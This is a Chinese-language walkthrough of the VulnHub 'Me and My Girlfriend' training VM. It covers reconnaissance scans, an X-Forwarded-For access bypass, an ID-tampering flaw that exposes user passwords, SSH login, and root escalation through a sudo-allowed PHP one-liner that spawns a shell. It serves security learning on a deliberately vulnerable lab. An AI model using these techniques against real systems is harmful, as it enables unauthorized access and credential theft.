vulnhub - ME AND MY GIRLFRIEND

1 靶场详情

靶场名字:vulnhub - ME AND MY GIRLFRIEND: 1
下载链接:https://download.vulnhub.com/meandmygirlfriend/Me-and-My-Girlfriend-1.ova

1.1 描述

描述:这个VM告诉我们,有一对恋人,即爱丽丝和鲍勃,这对情侣原本非常浪漫,但自从爱丽丝在一家私人公司“Ceban Corp”工作后,爱丽丝对鲍勃的态度发生了一些变化,就像有什么东西被“隐藏”了一样,鲍勃请求你的帮助,以获得爱丽丝隐藏的东西并获得对公司的完全访问权限!

难度级别:初级

1.2 提示

注意:有2个标志文件

学习:网络应用程序 |简单的权限提升

2 目标扫描

2.1 主机发现

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sn 192.168.0.0/24                            
[sudo] password for kali: 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-22 10:08 EDT
Nmap scan report for 192.168.0.1
Host is up (0.0019s latency).
MAC Address: F4:2A:7D:52:0E:DA (Tp-link Technologies)
Nmap scan report for 192.168.0.100
Host is up (0.000055s latency).
MAC Address: 00:0C:29:D1:18:54 (VMware)
Nmap scan report for 192.168.0.107
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.11 seconds

根据对个人网络的判断,目标靶机应该是192.168.0.100

2.2 扫描存活端口

┌──(kali㉿kali)-[~/Me_and_My_girlfriend]
└─$ sudo nmap -sT --min-rate 10000 -p- 192.168.0.100 -oA nmapscan/ports
# namp默认为TCP扫描,但默认状态为-sS的半开放式扫描 -sT为完整的TCP扫描
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-22 10:40 EDT
Nmap scan report for 192.168.0.100
Host is up (0.000058s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:D1:18:54 (VMware)
​
Nmap done: 1 IP address (1 host up) scanned in 1.20 seconds

2.3 扫描TCP端口

┌──(kali㉿kali)-[~/Me_and_My_girlfriend]
└─$ sudo nmap -sT -sV -sC -O -p22,80 192.168.0.100                 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-22 10:42 EDT
Nmap scan report for 192.168.0.100
Host is up (0.00018s latency).
​
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 57e15658460433563dc34ba793ee2316 (DSA)
|   2048 3b264de4a03bf875d96e1555828c7197 (RSA)
|   256 8f48979b55115bf16c1db34abc36bdb0 (ECDSA)
|_  256 d0c302a1c4c2a8ac3b84ae8fe5796676 (ED25519)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:D1:18:54 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
​
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.15 seconds

2.4 扫描UDP端口

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sU --top-ports 20 192.168.0.100    
​
# --top-ports 20 扫描最常用的20个端口
​
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-22 22:14 EDT
Nmap scan report for 192.168.0.100
Host is up (0.00016s latency).
​
PORT      STATE         SERVICE
53/udp    closed        domain
67/udp    closed        dhcps
68/udp    open|filtered dhcpc
69/udp    open|filtered tftp
123/udp   closed        ntp
135/udp   closed        msrpc
137/udp   closed        netbios-ns
138/udp   closed        netbios-dgm
139/udp   open|filtered netbios-ssn
161/udp   closed        snmp
162/udp   open|filtered snmptrap
445/udp   open|filtered microsoft-ds
500/udp   open|filtered isakmp
514/udp   closed        syslog
520/udp   open|filtered route
631/udp   closed        ipp
1434/udp  closed        ms-sql-m
1900/udp  open|filtered upnp
4500/udp  closed        nat-t-ike
49152/udp closed        unknown
MAC Address: 00:0C:29:D1:18:54 (VMware)
​
Nmap done: 1 IP address (1 host up) scanned in 7.52 seconds

2.5 使用默认脚本进行扫描

┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p22,80 192.168.0.100
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-22 22:26 EDT
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.0.100
Host is up (0.00017s latency).
​
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /robots.txt: Robots file
|   /config/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)'
|_  /misc/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)'
|_http-csrf: Couldn't find any CSRF vulnerabilities.
MAC Address: 00:0C:29:D1:18:54 (VMware)
​
Nmap done: 1 IP address (1 host up) scanned in 345.54 seconds
​

3 web渗透

3.1 打开主页进行访问

image-20230323102411732

翻译:你是谁?黑客吗?抱歉,这个站点只能本地访问

打开网页源代码,发现了一串注释

Who are you? Hacker? Sorry This Site Can Only Be Accessed local!<!-- Maybe you can search how to use x-forwarded-for -->

这里提示了我们会识别XFF协议

tips:
x-forwarded-for是一个HTTP头部,用于表示客户端的原始IP地址。当客户端通过代理服务器访问网站时,代理服务器会将客户端的IP地址添加到x-forwarded-for头部,以便网站能够识别客户端的真实IP地址。这个头部通常被用于识别和跟踪客户端的IP地址,以便进行安全审计、反垃圾邮件和其他网络安全操作。

3.2 目录爆破

┌──(kali㉿kali)-[~]
└─$ sudo gobuster dir -u http://192.168.0.100 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt 
[sudo] password for kali: 
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.0.100
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Timeout:                 10s
===============================================================
2023/03/22 22:29:06 Starting gobuster in directory enumeration mode
===============================================================
/misc                 (Status: 301) [Size: 312] [--> http://192.168.0.100/misc/]
/config               (Status: 301) [Size: 314] [--> http://192.168.0.100/config/]
/server-status        (Status: 403) [Size: 293]
Progress: 217368 / 220561 (98.55%)
===============================================================
2023/03/22 22:29:19 Finished
===============================================================
​

3.3 添加后缀名再次爆破

┌──(kali㉿kali)-[~]
└─$ sudo gobuster dir -u http://192.168.0.100 -x txt,sql,rar,zip,tar -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[sudo] password for kali: 
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.0.100
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Extensions:              sql,rar,zip,tar,txt
[+] Timeout:                 10s
===============================================================
2023/03/22 23:20:16 Starting gobuster in directory enumeration mode
===============================================================
/misc                 (Status: 301) [Size: 312] [--> http://192.168.0.100/misc/]
/config               (Status: 301) [Size: 314] [--> http://192.168.0.100/config/]
/robots.txt           (Status: 200) [Size: 32]
/server-status        (Status: 403) [Size: 293]
Progress: 1322788 / 1323366 (99.96%)
===============================================================
2023/03/22 23:21:40 Finished
===============================================================

总结整理:

# /misc 文件夹
http://192.168.0.100/misc/process.php # 前端无法看到任何东西,可能需要添加参数
# /config 文件夹
http://192.168.0.100/config/config.php # 前端无法看到任何东西,可能需要添加参数
# /robots.txt
/heyhoo.txt # 允许浏览器爬取/heyhoo.txt页面
http://192.168.0.100/heyhoo.txt 
    # Great! What you need now is reconn, attack and got the shell
# /server-status
无法访问,但暴露了Apache/2.4.7 (Ubuntu) Server at 192.168.0.100 Port 80

3.4 添加xff头访问

使用burpsuit代理添加x-forwarded-for:localhost访问页面

2023032301

在添加代理后,我们能够访问

网站首页

http://192.168.0.100/?page=index

image-20230323142339374

登陆界面

http://192.168.0.100/?page=login

image-20230323142429796

注册界面

http://192.168.0.100/?page=register

image-20230323142521741

关于界面

http://192.168.0.100/?page=about

image-20230323142546066

翻译:因为我们的努力,才有了很多伟大的人!他们在各自的领域拥有专业知识,这可能是一个在做生意或其他方面取得成功的机会!

以上界面,打开源码均未发现异常,也没发现注释

3.5 注册用户进行尝试

由于非注册的情况下内容较少,在能够直接尝试注册的情况下,登录到网页后台看看

2023032302

登陆后,我们能够看到三个按钮:

Dashboard 仪表盘 # 内容:一句激励人心的话
Profile 简介简况 # 能够看到用户的名称、用户名、星号密码
Logout 退出登录

3.6 横向越权

对于登录前后,我们能够明显观察到URL的改变

http://192.168.0.100/index.php?page=profile&user_id=12

他在后面带上了用户的id,所以我们是否能够尝试修改user_id来达到访问其他用户的需求

2023032303

通过修改user_id不仅能够获得其他用户的页面,并且由于是文本框显示的密码,我们还能获取到不同的用户密码

tips: 我们自己的id是12,则可能前面有11个用户名和密码
​
排列组合为:Name-username-password
Eweuh Tandingan-eweuhtandingan-skuyatuh
Aing Maung-aingmaung-qwerty!!!
Sunda Tea-sundatea-indONEsia
Sedih Aing Mah-sedihaingmah-cedihhihihi
Alice Geulis-alice-4lic3
Abdi Kasep-abdikasepak-dorrrrr
​
id=6/7/8/10/11为空

获取账号密码,并且在ssh端口开放的情况下,可以逐一进行尝试

# ssh用户名不会有空格,所以我们只采用username:password进行尝试
## 此处使用alice-4lic3这组账号密码成功登录
​
┌──(kali㉿kali)-[~]
└─$ sudo ssh alice@192.168.0.100                                                        
alice@192.168.0.100's password: 
Last login: Fri Dec 13 14:48:25 2019
alice@gfriEND:~$ 

注意:将所有能够获取的账号密码尽量都尝试一下,避免单一账号提权不成功的情况

4 提权

4.1 检查当前状态及权限

alice@gfriEND:~$ whoami
alice
alice@gfriEND:~$ uname -a
Linux gfriEND 4.4.0-142-generic #168~14.04.1-Ubuntu SMP Sat Jan 19 11:26:28 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
alice@gfriEND:/home$ ls # 查看用户目录判断有哪些用户
aingmaung  alice  eweuhtandingan  sundatea
alice@gfriEND:~$ sudo -l
Matching Defaults entries for alice on gfriEND:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
​
User alice may run the following commands on gfriEND:
    (root) NOPASSWD: /usr/bin/php # 发现了可能可以提权的点
​

4.2 再去翻一翻数据库

我们通过路径,获取了数据库的账号密码

alice@gfriEND:/home$ cd /var/www/html/config/
alice@gfriEND:/var/www/html/config$ ls
config.php
alice@gfriEND:/var/www/html/config$ cat config.php 
<?php
​
    $conn = mysqli_connect('localhost', 'root', 'ctf_pasti_bisa', 'ceban_corp');
alice@gfriEND:/var/www/html/config$ 

然后成功登录数据库

alice@gfriEND:/var/www/html/config$ mysql -uroot -p
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 95
Server version: 5.5.64-MariaDB-1ubuntu0.14.04.1 (Ubuntu)
​
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
​
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
​
MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| ceban_corp         |
| mysql              |
| performance_schema |
+--------------------+
4 rows in set (0.00 sec)
​
MariaDB [(none)]> use ceban_corp;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
​
Database changed
MariaDB [ceban_corp]> show tables;
+----------------------+
| Tables_in_ceban_corp |
+----------------------+
| tbl_users            |
+----------------------+
1 row in set (0.00 sec)
​
MariaDB [ceban_corp]> select * from tbl_users;
+----+-----------------+----------------+-------------+------------------------------+
| id | name            | username       | password    | email                        |
+----+-----------------+----------------+-------------+------------------------------+
|  1 | Eweuh Tandingan | eweuhtandingan | skuyatuh    | eweuhtandingan@cebancorp.com |
|  2 | Aing Maung      | aingmaung      | qwerty!!!   | aingmaung@cebancorp.com      |
|  3 | Sunda Tea       | sundatea       | indONEsia   | sundatea@cebancorp.com       |
|  4 | Sedih Aing Mah  | sedihaingmah   | cedihhihihi | sedihaingmah@cebancorp.com   |
|  5 | Alice Geulis    | alice          | 4lic3       | alice@cebancorp.com          |
|  9 | Abdi Kasep      | abdikasepak    | dorrrrr     | abdikasep@cebancorp.com      |
| 12 | test123         | testadmin      | testadmin   | test@test.com                |
+----+-----------------+----------------+-------------+------------------------------+
7 rows in set (0.00 sec)
​

4.3 php提权

在php有sudo权限的情况下,可以直接使用php允许命令执行,无论是直接执行系统命令还是直接反弹shell都可以获取root权限

alice@gfriEND:/var/www/html/config$ sudo /usr/bin/php -r "system('/bin/bash');"
root@gfriEND:/var/www/html/config# whoami
root

5 获取flag

root@gfriEND:~# find / | grep flag
/root/flag2.txt
/home/alice/.my_secret/flag1.txt

image-20230323150300053



vulnhub - ME AND MY GIRLFRIEND
http://localhost:8080/archives/vulnhub---me-and-my-girlfriend
作者
kinght
发布于
2024年08月30日
更新于
2024年08月30日
许可协议